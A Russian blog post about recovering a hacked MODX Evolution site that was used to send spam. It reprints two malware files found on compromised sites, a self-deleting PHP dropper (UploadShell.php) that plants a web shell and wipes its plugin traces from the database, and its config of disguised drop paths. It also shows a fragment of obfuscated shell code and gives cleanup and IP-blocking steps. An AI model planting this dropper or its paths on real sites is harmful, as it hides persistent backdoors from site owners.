MODX Evo: Массовая рассылка корреспонденции (SPAM).
Служба мониторинга сервисов хостинг провайдера известила, что один из моих сайтов рассылает спам. При проверке сайта на наличие вредоностного кода, антивирусы промолчали. Пришлось воспользоваться гуглом. По данной проблеме MODX Evo: Массовая рассылка корреспонденции (SPAM) информации набралось не так уж много. На сайте одного из MODx сообществ решался аналогичный вопрос "Похоже тоже взломали. Пошли письма". Т.е. на сайт был загружен Shell, который производил массовую рассылку СПАМА.
Похоже тоже взломали. Пошли письма.
Один из участников сообщества поделился некими ранее обнаружившимися несколькими интересными файлами через которые все это безобразие заливается.
UploadShell.php
<?php
require_once $_SERVER['DOCUMENT_ROOT'].'/assets/cache/temp/FileSettings.php';
$file = file_get_contents($filePath);
$res = file_put_contents($uploadPath, $file);
global $modx;
$pluginsTable = $modx->getFullTableName("site_plugins");
$result = $modx->db->query("SELECT id FROM $pluginsTable WHERE name = 'exp' ");
$count = mysql_num_rows($result);
if ($count > 0) {
$row = $modx->db->getRow($result);
if ($row['id']) {
$pluginDel = $modx->db->query("DELETE FROM $pluginsTable WHERE name = 'exp' ");
$eventsTable = $modx->getFullTableName("site_plugin_events");
$id = $row['id'];
$eventDel = $modx->db->query("DELETE FROM $eventsTable WHERE pluginid = $id ");
$modx->clearCache();
include_once MODX_BASE_PATH . "manager/processors/cache_sync.class.processor.php";
$sync = new synccache();
$sync->setCachepath(MODX_BASE_PATH . "assets/cache/");
$sync->setReport(false);
$sync->emptyCache();
}
}
unlink($filePath);
unlink($_SERVER['DOCUMENT_ROOT'].'/assets/cache/temp/FileSettings.php');
unlink($_SERVER['DOCUMENT_ROOT'].'/assets/cache/temp/UploadShell.php');
echo $res;
die();
FileSettings.php
<?php
# $uploadBasePath = '/manager/processors/kill.processor.php';
# $uploadBasePath = '/assets/images/logo.php';
# $uploadBasePath = '/manager/includes/lang/country/murug_country.inc.php';
$uploadBasePath = '/lang.php';
# $uploadBasePath = '/manager/media/style/MODxCarbon/images/icons/index.php'; # 7c39_0303.php
# $fileBaseName = '841rewb3v4x.php';
$fileBaseName = 'lang.php';
$uploadPath = $_SERVER['DOCUMENT_ROOT'].$uploadBasePath;
$filePath = $_SERVER['DOCUMENT_ROOT'].'/assets/cache/temp/'.$fileBaseName;
$localFilePath = '/var/www/jonin/data/www/niblocklogistics.com/retro2/protected/commands/'.$fileBaseName;
Решение
Проверить папки с путями, что указаны в коде. Удалить файлы, что указаны в коде. Файлы Shell'а содержат обфусцированый код ${"\x47L\x4f\x42\x41\x4c\x53"}["\x68u\x77\x69\x76\x63\x61\x71wk\x79\x79"] ... Так же необходимо удалить папку temp, которая лежит assets/cache/.
# $uploadBasePath = '/manager/processors/kill.processor.php';
# $uploadBasePath = '/assets/images/logo.php';
# $uploadBasePath = '/manager/includes/lang/country/murug_country.inc.php';
$uploadBasePath = '/lang.php';
# $uploadBasePath = '/manager/media/style/MODxCarbon/images/icons/index.php'; # 7c39_0303.php
# $fileBaseName = '841rewb3v4x.php';
$fileBaseName = 'lang.php';
После того, как вы удалили вредоносные файлы Shell'a. Пройдите следующую процедуру.
- Произведите BackUp всего проекта и Базы Данной.
- Обновите Вашу систему управления до последней актуальной версии.
- Смените пароль FTP доступа.
- В файл htaccess добавить правило
Order Deny,Allow
Deny from 80.243.184.227
Deny from 77.59.166.128
Deny from 146.185.239.19
Параметры getImageList MIGX
Создание страницы с ошибкой 404 в MODX Revolution
RESTful API в MODX Rrevolution
Создание тегов, меток или хэштегов в MODx
Документация по pdoCrumbs
Документация по pdoPage
Документация по pdoMenu
Настраиваем турбо-страницы Yandex в MODx Revo
Авторизация через соц.сети в MODX: hybridauth
Условия в MODx Revo сниппет IF
Документация MIGx
По шаговое обновление Modx Revolution до последней версии
Документация по pdoResources
Форматирование даты в MODx Revo
Облако тегов в MODX revolution
Перенос MODX Revolution на хостинг или с домена на домен
Настройка ЧПУ и htaccess для MODX Revolution
MODX - Добавление reCaptcha в FormIt и Login
Работа с ресурсами в MODx revolution
Вывод даты MODx Revo
Документация по getResources
Как создать карту сайта в MODX Revo
Проcтая форма обратной связи на MODx Revolution + FormIt
Как сделать меню на MODx при помощи Wayfinder
MODx Revo - поиск по сайту SimpleSearch modx
Быстрый старт в MODX Revolution
MODX Evo: Массовая рассылка корреспонденции (SPAM).
Возможно, вам будет интересно
Авторизация через соц.сети в MODX: hybridauth
Компонент MODX Revo Hybridauth позволяет регистрироваться пользователям на сайте через социальные сети и подгружать из них данных, а также объединять их в аккаунте.
Вывод даты MODx Revo
В разработке функциональности блока новостей, блога и тд. чаще всего приходится использовать вывод даты публикации документа. А именно важна сама форма выводы даты.
Как создать карту сайта в MODX Revo
Для создания карты сайта sitemap в MODx Revolution (Revo), можно воспользоваться дополнением GoogleSiteMap. Вся процедура установки достаточно проста и займет не более 10 минут.
Создание страницы с ошибкой 404 в MODX Revolution
Для нормальной индексации содержимого сайта поисковыми системами крайне важно создать страницу с 404 ERROR.
